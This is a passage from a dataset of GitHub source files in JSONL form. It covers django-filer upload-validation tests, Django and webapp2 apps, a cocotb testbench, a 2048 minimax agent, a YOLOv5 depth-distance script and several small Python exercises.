= json.loads(response.content.decode(\"utf-8\"))[\"file_id\"]\n img = File.objects.get(pk=file_id)\n content = img.file.file.read().decode(\"utf-8\")\n self.assertNotIn(disallowed, content)\n\n config.FILE_VALIDATORS[\"image/svg+xml\"] = svg_validation\n\n\nclass TestWhitelist(TestCase):\n def setUp(self) -> None:\n self.superuser = create_superuser()\n self.client.login(username='admin', password='secret')\n self.folder = Folder.objects.create(name='foo')\n self.config = apps.get_app_config(\"filer\")\n self.MIME_TYPE_WHITELIST = self.config.MIME_TYPE_WHITELIST\n\n def tearDown(self) -> None:\n self.folder.delete()\n self.config.MIME_TYPE_WHITELIST = self.MIME_TYPE_WHITELIST\n\n def set_whitelist(self, whitelist):\n self.config.MIME_TYPE_WHITELIST = whitelist\n\n def test_no_whitelist(self):\n self.set_whitelist([])\n for i in range(10):\n mime_type = get_random_string(6) + \"/\" + get_random_string(5)\n\n # If this throws an error, the test fails\n validate_upload(f\"test.{mime_type.split('/')[-1]}\", None, None, mime_type)\n\n def test_whitelist(self):\n self.set_whitelist([\"text/*\", \"image/x-png\"])\n\n expectation = {\n \"text/plain\": \"ok\",\n \"text/html\": \"fail\", # OK by whitelist but blocked by html validator\n \"image/x-png\": \"ok\",\n \"image/jpeg\": \"fail\",\n }\n\n for mime_type, expected_result in expectation.items():\n if expected_result == \"ok\":\n try:\n validate_upload(\"test-file\", None, None, mime_type)\n except FileValidationError:\n self.assertFalse(f\"Mime type {mime_type} expected to pass\")\n else:\n with self.assertRaises(FileValidationError):\n validate_upload(\"test-file\", None, None, mime_type)\n","repo_name":"django-cms/django-filer","sub_path":"tests/test_validation.py","file_name":"test_validation.py","file_ext":"py","file_size_in_byte":7328,"program_lang":"python","lang":"en","doc_type":"code","stars":1653,"dataset":"github-code","pt":"48"} +{"seq_id":"26000293005","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"login\", views.login_view, name=\"login\"),\n path(\"logout\", views.logout_view, name=\"logout\"),\n path(\"register\", views.register, name=\"register\"),\n\n path(\"create-lot\", views.new_lot, name=\"new_lot\"),\n path(\"lot/\", views.lot_view, name=\"lot_view\"),\n path(\"toggle_watchlist//\", views.toggle_watchlist, name=\"toggle_watchlist\"),\n path(\"watchlist\", views.watchlist, name=\"watchlist\"),\n\n path(\"categories\", views.categories, name=\"categories\"),\n path(\"categories/\", views.category_view, name=\"category_view\"),\n\n]\n","repo_name":"Reboot9/auction-project","sub_path":"auctions/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4319205041","text":"import os\nimport cocotb_test.simulator\n\nimport cocotb\nfrom cocotb.log import SimLog\nfrom cocotb.clock import Clock\nfrom cocotb.triggers import RisingEdge, Timer, ClockCycles, FallingEdge\n\n@cocotb.test()\nasync def run_test_spaced_2lvl_penc(dut):\n sys_clk = cocotb.fork(Clock(dut.clk, 2).start())\n\n dut.rst <= 0\n await RisingEdge(dut.clk)\n await RisingEdge(dut.clk)\n dut.rst <= 1\n await RisingEdge(dut.clk)\n await RisingEdge(dut.clk)\n dut.rst <= 0\n\n await RisingEdge(dut.clk)\n await RisingEdge(dut.clk)\n await RisingEdge(dut.clk)\n\n dut.one_hot <= 56\n await RisingEdge(dut.clk)\n dut.one_hot <= 58\n await RisingEdge(dut.clk)\n dut.one_hot <= 343\n await RisingEdge(dut.clk)\n print (56,'\\t',str(dut.index.value), str(dut.valid.value), str(dut.error.value))\n dut.one_hot <= 4024\n await RisingEdge(dut.clk)\n print (58,'\\t',str(dut.index.value), str(dut.valid.value), str(dut.error.value))\n await RisingEdge(dut.clk)\n print (343,'\\t',str(dut.index.value), str(dut.valid.value), str(dut.error.value))\n await RisingEdge(dut.clk)\n print (4024,'\\t',str(dut.index.value), str(dut.valid.value), str(dut.error.value))\n await RisingEdge(dut.clk)\n await RisingEdge(dut.clk)\n\n print (\"TEST1: single bit index verification.\")\n dut.one_hot <= (1<<0)\n await RisingEdge(dut.clk)\n dut.one_hot <= (1<<1)\n for i in range(2,4606):\n await RisingEdge(dut.clk)\n await FallingEdge(dut.clk)\n assert int(str(dut.index[(i-2)%8].value),2) == (i-2)\n dut.one_hot <= (1< 1:\n object_dict[ZID] = {\"anyOf\": can_be}\n else:\n object_dict[ZID] = can_be[0]\n\n while self._to_update:\n zid, display_zid, spec = self._to_update.pop()\n self._update_from_spec(object_dict, zid, display_zid, spec)\n\n # Compose the resulting .yaml file.\n #\n # Start with comment if appropriate.\n contents = \"\"\n comment = literal_spec.get(\"comment\")\n if comment is not None:\n contents += f\"# {comment}\\n\"\n\n # Append YAML dict.\n fake_file = io.StringIO()\n yaml.dump(schema, fake_file)\n fake_file.seek(0)\n contents += fake_file.read()\n\n with contextlib.ExitStack() as stack:\n if dry_run:\n outp = sys.stdout\n else:\n outp = stack.enter_context(\n open(os.path.join(self._root, f\"{ZID}.yaml\"), \"w\")\n )\n outp.write(contents)\n\n def _list(self):\n for key in self._builtin_dict.keys():\n yield key\n\n def list(self):\n for key in self._list():\n print(key)\n\n def generate_all(self, root_directory=None, tag=None, dry_run=True):\n for ZID in self._list():\n logging.info(f\"Generating config for {ZID} ...\")\n self.generate(ZID, root_directory, tag, dry_run)\n\n\nif __name__ == \"__main__\":\n import fire\n\n logging.basicConfig(level=logging.DEBUG)\n fire.Fire(SchemaComponent)\n","repo_name":"wikimedia/abstract-wiki-schemata-generator","sub_path":"generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":19084,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"24022852421","text":"import operator as op\nfrom functools import reduce\n\ndef solution(n):\n answer = 0\n j = 0\n for i in range(n, -1, -2):\n answer += nCr(i + j, j)\n j += 1\n return answer % 1000000007\n\n\ndef nCr(n, r):\n if n < 1 or r < 0 or n < r:\n raise ValueError\n r = min(r, n-r)\n numerator = reduce(op.mul, range(n, n-r, -1), 1)\n denominator = reduce(op.mul, range(1, r+1), 1)\n return numerator // denominator\n\n\n","repo_name":"hugh4652/Programmers","sub_path":"레벨 3/2 X n 타일링/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26832482098","text":"import numpy as np\nimport re\nimport itertools\nfrom collections import Counter\nfrom tensorflow.contrib import learn\nimport jieba\n\ndef clean_str(string):\n \"\"\"\n Tokenization/string cleaning for all datasets except for SST.\n Original taken from https://github.com/yoonkim/CNN_sentence/blob/master/process_data.py\n \"\"\"\n #string = re.sub(r\"[^A-Za-z0-9(),!?\\'\\`]\", \" \", string)\n string = re.sub(r\"\\'s\", \" \\'s\", string)\n string = re.sub(r\"\\'ve\", \" \\'ve\", string)\n string = re.sub(r\"n\\'t\", \" n\\'t\", string)\n string = re.sub(r\"\\'re\", \" \\'re\", string)\n string = re.sub(r\"\\'d\", \" \\'d\", string)\n string = re.sub(r\"\\'ll\", \" \\'ll\", string)\n string = re.sub(r\",\", \" , \", string)\n string = re.sub(r\"!\", \" ! \", string)\n string = re.sub(r\"\\(\", \" \\( \", string)\n string = re.sub(r\"\\)\", \" \\) \", string)\n #string = re.sub(r\"\\?\", \" \\? \", string)\n #string = re.sub(r\"\\s{2,}\", \" \", string)\n return string.strip().lower()\n\ndef load_data_and_labels(data_file):\n \"\"\"\n Loads MR polarity data from files, splits the data into words and generates labels.\n Returns split sentences and labels.\n \"\"\"\n # Load data from files\n obj = open(data_file, \"r\")\n y, x_text, query= [],[],[]\n for ele in obj:\n ele = ele.strip().split(\"\\t\")\n if len(ele) !=5 or ele[0].strip() not in [\"1\", \"-1\"]:\n #print ele\n continue\n if (ele[0].strip() == \"1\"):\n y.append([0])\n else:\n y.append([1])\n\n query_text = ele[1].strip().decode(\"utf8\")\n doc_text = ele[2].strip().decode(\"utf8\")\n x_text.append( \" \".join( jieba.cut(doc_text) ) )\n query.append( \" \".join( jieba.cut(query_text) ) )\n return [x_text, np.array(y), np.array(query)]\n\ndef batch_iter(data, batch_size, num_epochs, shuffle=True):\n \"\"\"\n Generates a batch iterator for a dataset.\n \"\"\"\n data = np.array(data)\n data_size = len(data)\n num_batches_per_epoch = int((len(data)-1)/batch_size) + 1\n for epoch in range(num_epochs):\n # Shuffle the data at each epoch\n if shuffle:\n shuffle_indices = np.random.permutation(np.arange(data_size))\n shuffled_data = data[shuffle_indices]\n else:\n shuffled_data = data\n for batch_num in range(num_batches_per_epoch):\n start_index = batch_num * batch_size\n end_index = min((batch_num + 1) * batch_size, data_size)\n yield shuffled_data[start_index:end_index]\n\ndef build_voc(train_data_file, test_data_file, dev_sample_percentage, max_document_length):\n print(\"Loading data...\")\n train_doc, train_label, train_query = load_data_and_labels(train_data_file)\n test_doc, test_label, test_query = load_data_and_labels(test_data_file)\n\n # Build vocabulary\n #max_document_length = max([len(x.split(\" \")) for x in train_doc])\n vocab_processor = learn.preprocessing.VocabularyProcessor(max_document_length, 2)\n vocab_processor.fit(train_doc)\n\n train_doc_feas = np.array(list(vocab_processor.transform(train_doc)))\n train_query_feas = np.array(list(vocab_processor.transform(train_query)))\n\n test_doc_feas = np.array(list(vocab_processor.transform(test_doc)))\n test_query_feas = np.array(list(vocab_processor.transform(test_query)))\n\n np.random.seed(9)\n shuffle_indices = np.random.permutation(np.arange(len(train_label)))\n train_doc_feas_shuffled = train_doc_feas[shuffle_indices]\n train_query_feas_shuffled = train_query_feas[shuffle_indices]\n train_label_shuffled = train_label[shuffle_indices]\n\n # Split train/test set\n dev_sample_index = -1 * int(dev_sample_percentage * float(len(train_label)))\n train_doc_feas, dev_doc_feas = train_doc_feas_shuffled[:dev_sample_index], train_doc_feas_shuffled[dev_sample_index:]\n train_label, dev_label = train_label_shuffled[:dev_sample_index], train_label_shuffled[dev_sample_index:]\n train_query_feas, dev_query_feas = train_query_feas_shuffled[:dev_sample_index], train_query_feas_shuffled[dev_sample_index:]\n\n print(\"Vocabulary Size: {:d}\".format(len(vocab_processor.vocabulary_)))\n return train_doc_feas, train_label, train_query_feas, dev_doc_feas, dev_label, dev_query_feas, test_doc_feas, test_label, test_query_feas\n","repo_name":"lansedefen/research","sub_path":"ml_learning/tensorflow/dssm/data_helpers.py","file_name":"data_helpers.py","file_ext":"py","file_size_in_byte":4260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25944214656","text":"from __future__ import absolute_import, division, print_function\n\nimport torch\nimport cv2 as cv\n\nimport os\nimport sys\nimport glob\nimport argparse\nimport numpy as np\nimport PIL.Image as pil\nimport matplotlib as mpl\nimport matplotlib.cm as cm\nfrom sklearn.linear_model import LinearRegression\n\nimport torch\nfrom torchvision import transforms, datasets\n\nimport networks\nfrom layers import disp_to_depth\nfrom util import download_model_if_doesnt_exist\nfrom evaluate_depth import STEREO_SCALE_FACTOR\nimport numpy as np\nfrom PIL import Image\nimport copy\n\nimport time\n\n\n#Return pandas DataFrame contains (x_min, y_min) and (x_max, y_max) and classes of object in frame\ndef model_yolov5(frame, model):\n # Model\n #model = torch.hub.load('ultralytics/yolov5', 'yolov5s', pretrained=True)\n\n # Inference\n results = model(frame)\n results.print()\n return results.pandas().xyxy[0]\n\n\n#Return an numpy array represents for depth map\ndef depth_predict(image_path, encoder, depth_decoder):\n\n original_width, original_height = image_path.shape[1], image_path.shape[0]\n\n # PREDICTING ON EACH IMAGE IN TURN\n with torch.no_grad():\n\n # Load image and preprocess\n image_path = cv.resize(\n image_path, (feed_width, feed_height), cv.INTER_LANCZOS4)\n image_path = transforms.ToTensor()(image_path).unsqueeze(0)\n\n # PREDICTION, encoder and decoder\n image_path = image_path.to(device)\n features = encoder(image_path)\n outputs = depth_decoder(features)\n\n disp = outputs[(\"disp\", 0)]\n disp_resized = torch.nn.functional.interpolate(\n disp, (original_height, original_width), mode=\"bilinear\", align_corners=False)\n\n scaled_disp, depth = disp_to_depth(disp, 0.1, 100)\n metric_depth = STEREO_SCALE_FACTOR * depth.cpu().numpy()\n\n metric_depth = resize_depth_map(\n metric_depth, original_width, original_height)\n\n return metric_depth\n\n\ndef resize_depth_map(metric_depth, original_width, original_height):\n metric_depth = torch.from_numpy(metric_depth)\n metric_depth_resized = torch.nn.functional.interpolate(metric_depth,\n (original_height, original_width), mode=\"bilinear\", align_corners=False)\n\n # Saving colormapped depth image\n metric_depth_resized_np = metric_depth_resized.squeeze().cpu().numpy()\n return metric_depth_resized_np\n\n\n#Calculate relative distance of objects in the image from depth map and bounder box\n#depth_map : nparray\n#data: Dataframe obtains from yolov5\n#return dataframe that contain collumn \"rev_distance\"\ndef calculate_rev(depth_map, data):\n rev_dis = []\n for row in data.iterrows():\n x_min = int(row[1]['xmin'])\n y_min = int(row[1]['ymin'])\n x_max = int(row[1]['xmax'])\n y_max = int(row[1]['ymax'])\n\n rev = 0\n num = (y_max - y_min) * (x_max - x_min)\n for i in range(y_min, y_max):\n for j in range(x_min, x_max):\n rev += depth_map[i, j]\n rev /= num\n rev_dis.append(rev)\n\n data['rev_distance'] = rev_dis\n return data\n\n\ndef calculate_abs(depth_map, data):\n abs_dis = []\n for row in data.iterrows():\n x_min = int(row[1]['xmin'])\n y_min = int(row[1]['ymin'])\n x_max = int(row[1]['xmax']) # Wight\n y_max = int(row[1]['ymax']) # Hight\n \n # Tính median của tất cả các giá trị depth trong bounding box\n depth_box = depth_map[y_min:y_max, x_min:x_max]\n median_depth = np.median(depth_box)\n\n # Tính khoảng cách tuyệt đối\n absolute_distance = ((-0.00056 * median_depth ** 2 +\n 0.146 * median_depth + 1.02) * 0.5) * 100\n\n abs_dis.append(absolute_distance)\n\n data['abs_distance'] = abs_dis\n return data\n\n\ndef calculate_abs2(depth_map, data, camera_height):\n abs_dis = []\n for row in data.iterrows():\n x_min = int(row[1]['xmin'])\n y_min = int(row[1]['ymin'])\n x_max = int(row[1]['xmax']) # Wight\n y_max = int(row[1]['ymax']) # Hight\n \n # Tính median của tất cả các giá trị depth trong bounding box\n depth_box = depth_map[y_min:y_max, x_min:x_max]\n median_depth = np.median(depth_box)\n \n # Fit a linear regression model to obtain the coefficients c0, c1, and c2\n X = np.array([[median_depth**2], [median_depth], [1]])\n Y = np.array([camera_height]).reshape((1, 1))\n \n model = LinearRegression().fit(X, Y)\n c0, c1, c2 = model.intercept_[0], model.coef_[1], model.coef_[2]\n\n # Calculate the absolute distance using equation (1)\n absolute_distance = (c0 + c1 * median_depth +\n c2 * median_depth**2) * camera_height\n \n abs_dis.append(absolute_distance)\n\n data['abs_distance'] = abs_dis\n return data\n\n#Drawing label and distance on frame\n#frame: image\n#data: dataFrame contain relative distance\ndef drawing_output(frame, model, encoder, depth_decoder):\n frame_temp = copy.copy(frame)\n y = model_yolov5(frame_temp, model)\n map = depth_predict(frame, encoder, depth_decoder)\n data = calculate_abs(map, y)\n\n for row in data.iterrows():\n x_min = int(row[1]['xmin'])\n y_min = int(row[1]['ymin'])\n x_max = int(row[1]['xmax'])\n y_max = int(row[1]['ymax'])\n\n name_label = row[1]['name']\n rev = row[1]['abs_distance']\n \n # x = rev\n # h = 0.5\n # c0, c1, c2 = 1.02, 0.146, -0.00056\n # abs_dis = ((c0 + c1*x + c2*x**2) * h ) * 100\n \n \n str_output = name_label + \": \" + str(int(rev)) + \"cm\"\n # # TEST\n\n # # Example input: camera height and bounding box\n # camera_height = 1.5\n # bounding_box = [x_min, y_min, x_max, y_max]\n\n # # Call the function to calculate the absolute distance (ABS) from the camera\n # absolute_distance = calculate_abs_distance(\n # map, camera_height, bounding_box)\n # cv.putText(frame, \"abs {:.2f} cm\".format(\n # abs_dis), (x_min, y_max), cv.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)\n\n cv.rectangle(frame, (x_min, y_min),\n (x_max, y_max),\n (0, 0, 255), 2, 8)\n cv.putText(frame, str_output, (x_min, y_min),\n cv.FONT_HERSHEY_SIMPLEX, 0.7, (0, 255, 255), 1, cv.LINE_AA)\n return frame\n\n\ndef calculate_abs_distance(depth_image, camera_height, bounding_box):\n # Extract the estimated distances of all the pixels inside the bounding box\n print(\"DepthMap nay de xem\", depth_image)\n distances = depth_image[bounding_box[0]:bounding_box[2], bounding_box[1]:bounding_box[3]]\n print(\"bounding_box[0]\", bounding_box[0])\n print(\"bounding_box[2]\", bounding_box[2])\n print(\"bounding_box[1]\", bounding_box[1])\n print(\"bounding_box[3]\", bounding_box[3])\n # Compute the relative distance (REV) of the object\n relative_distance = np.median(distances)\n print(\"relative_distance\", relative_distance)\n # Define the input X and the output Y for the curve fitting\n X = np.array([[relative_distance**2], [relative_distance], [1]])\n Y = np.array([camera_height])\n\n # Fit a linear regression model to obtain the coefficients c0, c1, and c2\n model = LinearRegression().fit(X, Y)\n c0, c1, c2 = model.coef_[0], model.coef_[1], model.coef_[2]\n\n # Calculate the absolute distance (ABS) using equation (1)\n absolute_distance = (c0 + c1 * relative_distance +\n c2 * relative_distance**2) * camera_height\n\n return absolute_distance\n\n\nif __name__ == '__main__':\n model = torch.hub.load('ultralytics/yolov5', 'yolov5s', pretrained=True)\n model_name = \"mono+stereo_640x192\"\n\n #use GPU\n if torch.cuda.is_available():\n device = torch.device(\"cuda\")\n else:\n device = torch.device(\"cpu\")\n\n #\n download_model_if_doesnt_exist(model_name)\n model_path = os.path.join(\"models\", model_name)\n print(\"-> Loading model from \", model_path)\n encoder_path = os.path.join(model_path, \"encoder.pth\")\n depth_decoder_path = os.path.join(model_path, \"depth.pth\")\n\n # LOADING PRETRAINED MODEL\n print(\" Loading pretrained encoder\")\n encoder = networks.ResnetEncoder(18, False)\n loaded_dict_enc = torch.load(encoder_path, map_location=device)\n\n # extract the height and width of image that this model was trained with\n feed_height = loaded_dict_enc['height']\n feed_width = loaded_dict_enc['width']\n filtered_dict_enc = {\n k: v for k, v in loaded_dict_enc.items() if k in encoder.state_dict()}\n encoder.load_state_dict(filtered_dict_enc)\n encoder.to(device)\n encoder.eval()\n\n print(\" Loading pretrained decoder\")\n depth_decoder = networks.DepthDecoder(\n num_ch_enc=encoder.num_ch_enc, scales=range(4))\n\n loaded_dict = torch.load(depth_decoder_path, map_location=device)\n depth_decoder.load_state_dict(loaded_dict)\n\n depth_decoder.to(device)\n depth_decoder.eval()\n\n # Open the camera\n cap = cv.VideoCapture(0)\n\n # Continuously capture images from the camera\n while True:\n\n # Read a depth frame from the camera\n ret, frame = cap.read()\n if ret == False:\n break\n\n frame = drawing_output(frame, model, encoder, depth_decoder)\n\n cv.imshow(\"Object Detection\", frame)\n\n # Break the loop if the 'q' key is pressed\n if cv.waitKey(1) & 0xFF == ord('q'):\n break\n\n # Release the camera and close the window\n cap.release()\n cv.destroyAllWindows()\n","repo_name":"DTPThuy/absDistance","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40641400791","text":"from exercise2 import *\nfrom larcc import *\n\n\"\"\"\nLAR FUNCTIONS\n\"\"\"\n\n# Translates points of a model, adding 3rd dimension if necessary\n# author: Stefano Russo\ndef translateModel(model,tvect):\n\tV,CV = model\n\t# add 3rd dimension to points if necessary\n\tif len(V[0])==2 and len(tvect)==3:\n\t\tV = AA ( lambda x: x+[0.0] ) (V)\n\t# add 3rd dimension to tvect if necessary\n\tif len(V[0])==3 and len(tvect)==2:\n\t\ttvect = tvect+[0]\n\tV = translatePoints(V,tvect)\n\treturn V,CV\n\n# Unifies models of the list, giving a single model\n# author: Stefano Russo\ndef larStruct(model_list):\n\tfinalV=[]\n\tfinalCV=[]\n\tcount=0\n\tfor m in model_list:\n\t\tfinalV=finalV+m[0]\n\t\ttempCV = AA(AA(lambda x: x+count))(m[1])\n\t\tfinalCV=finalCV+tempCV\n\t\tcount = count + len(m[0])\n\treturn finalV,finalCV\n\n# Multiplies a lar model, giving new lar model composed by all sub-models\n# author: Stefano Russo\ndef multiply(n,tvect,model):\n\toldV,oldCV=model\n\t# transform points from integer to float\n\toldV = AA(AA (lambda x: float(x))) (oldV)\n\t# add 3rd dimension to points if necessary\n\tif len(oldV[0])==2 and len(tvect)==3:\n\t\toldV = AA ( lambda x: x+[0.0] ) (oldV)\n\t# add 3rd dimension to tvect if necessary\n\tif len(oldV[0])==3 and len(tvect)==2:\n\t\ttvect = tvect+[0]\n\tnewV = oldV\n\tnewCV = oldCV\n\t# each iteration multiplies the model\n\tfor i in range(1,n):\n\t\t# translate points of \"tvect*i\"\n\t\tnewV = newV + translatePoints(oldV, AA(lambda x: x*i)(tvect))\n\t\t# create new cells, related to above points\n\t\tnewCV = newCV + AA(AA(lambda x: x+(len(oldV)*i)))(oldCV)\n\treturn newV,newCV\n\n\"\"\"\nGRASS\n\"\"\"\n\ngrass = COLOR(P_GREEN)(CUBOID([250,250,4.5]))\ngrass = T(3)(-4.5)(grass)\n\n\"\"\"\nNEAR BUILDINGS\n\"\"\"\n# building 1\nbuilding1_base = larIntervals([1,1,1])([50,30,20])\nbuilding1_roof_1 = translateModel( larIntervals([1,1,1])([52,32,1]) , [-1,-1,20] )\nbuilding1_roof_v = [ [-1,-1,21],[51,-1,21],[51,31,21],[-1,31,21],[10,15,27],[40,15,27] ]\nbuilding1_roof_c = [ [0,1,2,3,4,5] ]\nbuilding1 = larStruct([building1_base,building1_roof_1,(building1_roof_v,building1_roof_c)])\n\n# silos\nsilo_base = larRod((10,50))()\nsilo_top = translateModel(larSphere(10)([9,18]),[0,0,50])\nsilo = larStruct([silo_base,silo_top])\nsilo = translateModel(silo,[-5,110])\nsilos = multiply(3,[25,0],silo)\n\n# near buildings assembly\nnear_buildings = COLOR(P_SBROWN)(STRUCT(MKPOLS(building1) + MKPOLS(silos)))\n\n\"\"\"\nROAD\n\"\"\"\n\n# asphalt\nasphalt = COLOR(BLACK)(CUBOID([250,20,0.05]))\n\n# sidewalk\nsidewalk = T(2)(0.25)(CUBOID([250,5,0.01]))\n\n# road assembly\nroad = STRUCT([sidewalk, \n\tT(2)(25.5)(sidewalk),\n\tT(2)(5.5)(asphalt)])\n\n# pathway\npathway = T([1,2])([11.5,-19])(CUBOID([3.5,17,0.05]))\n\n\"\"\"\nAREA ASSEMBLY\n\"\"\"\n\n# area_model = STRUCT([ T(2)(20)(road), grass,\n# \tT([1,2,3])([140,80]) (S([1,2,3])([1.5,1.5,1.5])(pathway)),\n# \tT([1,2,3])([30,80]) (S([1,2,3])([1.5,1.5,1.5])(pathway)),\n# \tT([1,2,3])([140,80,-0.2])( S([1,2,3])([1.5,1.5,1.5])(house_model_3D)),\n# \tT([1,2])([35,80]) (near_buildings)])\n\n# VIEW(area_model)","repo_name":"cvdlab-alumni/436425","sub_path":"2014-04-11/python/exercise3.py","file_name":"exercise3.py","file_ext":"py","file_size_in_byte":2921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4074051892","text":"from random import randint\n\nfrom BaseAI import BaseAI\n\n\n\nimport time\n\nimport numpy as np\n\ntimeLimit = 0.2\ntolerence = 1 # at most eat up tolerence*100% of the time limit\ndepth_limit = 5\nclass PlayerAI(BaseAI):\n \"\"\"\n 0: \"UP\",\n 1: \"DOWN\",\n 2: \"LEFT\",\n 3: \"RIGHT\"\n \"\"\"\n def __init__(self):\n self.prevTime = None\n\n def getMove(self, grid):\n\n # Simple random move\n # return self._randomMove(grid)\n self.prevTime = time.process_time()\n action = self._minmax(grid)\n\n # minmax startegy\n if action is not None:\n return action\n else:\n return np.random.choice(range(grid.size))\n \n def _minmax(self, grid):\n cur_depth = 0\n child, _, action = self._maximize(grid, -np.inf, np.inf, cur_depth)\n \n return action\n\n def _maximize(self, state, alpha, beta, depth):\n\n # terminal state\n if not state.canMove():\n # print(\"###### Max node is terminated.\")\n return None, state.getMaxTile(), None\n\n # heuristically terminal state\n if depth > depth_limit or (time.process_time() - self.prevTime) > tolerence * timeLimit :\n return None, self._eval(state), None\n\n maxChild, maxUtility, maxAction = None, -np.inf, None\n\n for (action, child) in self._getChildrens(state, method = 'max'):\n _, utility = self._minimize(child, alpha, beta, depth+1)\n\n if utility > maxUtility:\n maxChild, maxUtility, maxAction = child, utility, action\n\n if maxUtility >= beta:\n break\n\n if maxUtility >= alpha:\n alpha = maxUtility\n\n return maxChild, maxUtility, maxAction\n\n\n def _minimize(self, state, alpha, beta, depth):\n\n # Terminal state\n if not state.getAvailableCells():\n return None, state.getMaxTile()\n\n if (time.process_time() - self.prevTime) > tolerence * timeLimit or depth > depth_limit:\n\n return None, self._eval(state)\n\n minChild, minUtility = None, np.inf\n\n for child in self._getChildrens(state, method='min'):\n _, utility, _action = self._maximize(child, alpha, beta, depth+1)\n\n if utility < minUtility:\n minChild, minUtility = child, utility\n\n if minUtility <= alpha:\n break\n\n if minUtility < beta:\n beta = minUtility\n\n return minChild, minUtility\n\n def _eval(self, state):\n\n score_config = np.array(state.map)\n score_config_filter_positive = score_config[score_config > 0]\n\n weight_mat_snaked = np.array([[2**28, 2**24, 2**20, 2**16],\n [2**8, 2**9, 2**10, 2**11],\n [2**7, 2**6, 2**5, 2**4],\n [2**0, 2**1, 2**2, 2**3]]).astype(np.int64)\n\n\n h1 = len(state.getAvailableCells())\n h2 = np.sum(np.multiply( weight_mat_snaked, score_config))\n\n return h2\n\n def _getChildrens(self, state, method):\n\n if method == 'max':\n\n action_children_pair = []\n\n for move in state.getAvailableMoves():\n grid = state.clone()\n grid.move(move)\n action_children_pair.append((move, grid))\n\n return sorted(action_children_pair, key = lambda x: self._eval(x[1]), reverse=True)\n\n elif method == 'min':\n\n children = []\n\n for move in state.getAvailableCells():\n if state.canInsert(move):\n #for newValue in [2, 4]:\n grid = state.clone()\n newValue = np.random.choice([2, 4])\n grid.insertTile(move, newValue)\n children.append(grid)\n\n return sorted(children, key=self._eval, reverse=False)\n\n else:\n raise Exception(f'{method} unsupported.')\n\n\n\n def _randomMove(self, grid):\n\n moves = grid.getAvailableMoves()\n\n return moves[randint(0, len(moves) - 1)] if moves else None","repo_name":"waitaminutewhoareyou/edX-Artificial-Intelligence","sub_path":"Week 4 Project - Adversarial Search and Games/PlayerAI.py","file_name":"PlayerAI.py","file_ext":"py","file_size_in_byte":4104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73668543184","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('article', '0020_auto_20150228_2219'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='article',\n name='game_theme',\n field=models.CharField(default=b'btn-primary', help_text=b'Enter a color theme for this review', max_length=20, choices=[(b'btn-primary', b'Blue'), (b'btn-success', b'Green'), (b'btn-info', b'Light Blue'), (b'btn-warning', b'Yellow'), (b'btn-danger', b'Red')]),\n preserve_default=True,\n ),\n ]\n","repo_name":"awaseem/vgre.me","sub_path":"django_project/article/migrations/0021_auto_20150228_2245.py","file_name":"0021_auto_20150228_2245.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"4104481169","text":"import webapp2\nimport cgi\n\nform=\"\"\"\n
\n What is your birthday?\n
\n \n \n \n
%(error)s
\n
\n
\n\t\n
\n\"\"\"\n\n\nmonths = ['January',\n 'February',\n 'March',\n 'April',\n 'May',\n 'June',\n 'July',\n 'August',\n 'September',\n 'October',\n 'November',\n 'December']\n\nmonths_abbvs = dict((m[:3].lower(),m) for m in months)\n \ndef valid_month(month):\n if month:\n short_month = month[:3].lower()\n return months_abbvs.get(short_month)\n\ndef valid_day(day):\n if day and day.isdigit():\n dayInt = int(day)\n if (dayInt>=1) and (dayInt<=31):\n return dayInt\n\ndef valid_year(year):\n if year and year.isdigit():\n yearInt = int(year)\n if (yearInt>=1900) and (yearInt<=2020):\n return yearInt\n\nclass MainHandler(webapp2.RequestHandler):\n def write_form(self, error=\"\", month=\"\", day=\"\", year=\"\"):\n self.response.out.write(form % {\"error\": error,\n \"month\": cgi.escape(month, quote=True),\n \"day\": cgi.escape(day, quote=True),\n \"year\": cgi.escape(year, quote=True)})\n \n def get(self):\n self.write_form()\n\n def post(self):\n user_month = self.request.get('month')\n user_day = self.request.get('day')\n user_year = self.request.get('year')\n\n month = valid_month(user_month)\n day = valid_day(user_day)\n year = valid_year(user_year)\n\n if not (day and month and year):\n self.write_form(\"That's NOT valid!\",\n user_month, user_day, user_year)\n else:\n self.redirect(\"/thanks\")\n\nclass ThanksHandler(webapp2.RequestHandler):\n def get(self):\n self.response.out.write('Thanks!')\n \napp = webapp2.WSGIApplication([('/', MainHandler), ('/thanks', ThanksHandler)],\n debug=True)\n","repo_name":"daniloz/dzf-test","sub_path":"helloUdacity/main_CS253_Unit2_part2.py","file_name":"main_CS253_Unit2_part2.py","file_ext":"py","file_size_in_byte":2441,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"41802437070","text":"import crawl\nimport convert\nimport align\n\nprint(\"\\n\\nStart crawling? (Y/N)\")\nans = input().lower()\nif ans != \"\":\n if ans[0] == \"y\":\n crawl.start()\n\nprint(\"\\n\\nConvert to OWL? (Y/N)\")\nans = input().lower()\nif ans != \"\":\n if ans[0] == \"y\":\n convert.start()\n\nprint('\\n\\nDo you want to align and merge your data with \"./ontology/ontology.owl\"? (Y/N)')\nans = input().lower()\nif ans != \"\":\n if ans[0] == \"y\":\n 